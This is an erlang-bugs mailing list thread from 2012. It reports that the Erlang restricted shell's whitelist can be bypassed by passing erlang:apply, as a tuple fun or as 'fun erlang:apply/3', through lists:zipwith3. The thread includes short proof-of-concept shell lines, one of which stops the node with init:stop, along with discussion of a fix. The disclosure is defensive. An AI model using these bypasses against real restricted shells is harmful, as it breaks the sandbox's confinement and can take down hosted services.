[erlang-bugs] The Erlang Restricted Shell allows execution of random commands

Ahmed Omar <>
Tue Jan 31 15:07:06 CET 2012


But in that case, you can check in restrict.erl if any of the Args is equal
to any of fun erlang:apply/A of erlang:spawn/A

or maybe it should detect any fun M:F/A and check it against your module.

On Tue, Jan 31, 2012 at 2:38 PM, Roberto Aloi <
> wrote:

> Not really. In R16 you could do:
>
> 1> F = fun (M,F,A) -> lists:zipwith3(fun erlang:apply/3, [M], [F], [A])
> end.
> #Fun<erl_eval.18.59269574>
> 2> F(init, stop, []).
> [ok]
>
> *dies*
>
> Regards,
>
> Roberto Aloi
> ---
> Erlang Solutions Ltd.
> www.erlang-solutions.com
>
>
> ----- Original Message -----
> > It sounds to work only with tuple funs, which is going to be removed
> > soon anyway.
> >
> >
> > OTP-9649 Tuple funs (a two-element tuple with a module name and a
> > function) are now officially deprecated and will be removed
> > in R16. Use 'fun M:F/A' instead. To make you aware that your
> > system uses tuple funs, the very first time a tuple fun is
> > applied, a warning will be sent to the error logger.
> >
> >
> >
> > 1> F = fun (M,F,A) -> lists:zipwith3(fun(M, F,A)-> erlang:apply(M, F,
> > A) end, [M], [F], [ A ]) end.
> > #Fun<erl_eval.18.59269574>
> > 2> F(erlang, time, []).
> > ** exception exit: restricted shell does not allow time()
> > in function shell:non_local_allowed/4
> > in call from lists:zipwith3/4
> > 3>
> >
> >
> > or am i wrong?
> >
> >
> > On Tue, Jan 31, 2012 at 12:46 PM, Roberto Aloi <
> >  > wrote:
> >
> >
> > Hi all,
> >
> > reading from the Erlang doc:
> >
> > http://www.erlang.org/doc/man/shell.html#start_restricted-1
> >
> > "The shell may be started in a restricted mode. In this mode, the
> > shell evaluates a function call only if allowed."
> >
> > Let's write a minimal module which whitelists the 'lists' module
> > only:
> >
> > =====
> > -module(restrict).
> >
> > -export([local_allowed/3, non_local_allowed/3]).
> >
> > -define(NON_LOCAL_ALLOWED, [lists]).
> >
> > local_allowed(_Cmd, _Args, State) ->
> > {false, State}.
> >
> > non_local_allowed({Module, _Function}, _Args, State) ->
> > {lists:member(Module, ?NON_LOCAL_ALLOWED), State}.
> > =====
> >
> > Let's then start a restricted shell, using the above module.
> >
> > $ erlc restrict.erl
> > $ erl -stdlib restricted_shell restrict
> >
> > Erlang R14B04 (erts-5.8.5) [source] [64-bit] [smp:4:4] [rq:4]
> > [async-threads:0] [hipe] [kernel-poll:false]
> >
> > Restricted Eshell V5.8.5 (abort with ^G)
> >
> > And let's see if it works as expected.
> >
> > 1> erlang:time().
> > ** exception exit: restricted shell does not allow time()
> >
> > Cool.
> >
> > 2> erlang:apply(erlang, time, []).
> > ** exception exit: restricted shell does not allow time()
> >
> > Yeah.
> >
> > 3> F = fun (M,F,A) -> lists:zipwith3({erlang, apply}, [M], [F], [ A
> > ]) end.
> > #Fun<erl_eval.18.59269574>
> > 4> F(erlang, time, []).
> > [{12,35,45}]
> >
> > Ooops.
> >
> > Please notice that I'm not the one who actually discovered this bug
> > (or is it a feature?). It was actually one of the tryerlang.org
> > users, who kindly informed me about this. Originally I thought this
> > was an application bug, but it is not. This is more generic and it
> > affects the restricted shell itself.
> >
> > Best regards,
> >
> > Roberto Aloi
> > ---
> > @robertoaloi
> > Erlang Solutions Ltd.
> > www.erlang-solutions.com
> >
> > _______________________________________________
> > erlang-bugs mailing list
> > 
> > http://erlang.org/mailman/listinfo/erlang-bugs
> >
> >
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://erlang.org/pipermail/erlang-bugs/attachments/20120131/0c731054/attachment-0001.html>


More information about the erlang-bugs mailing list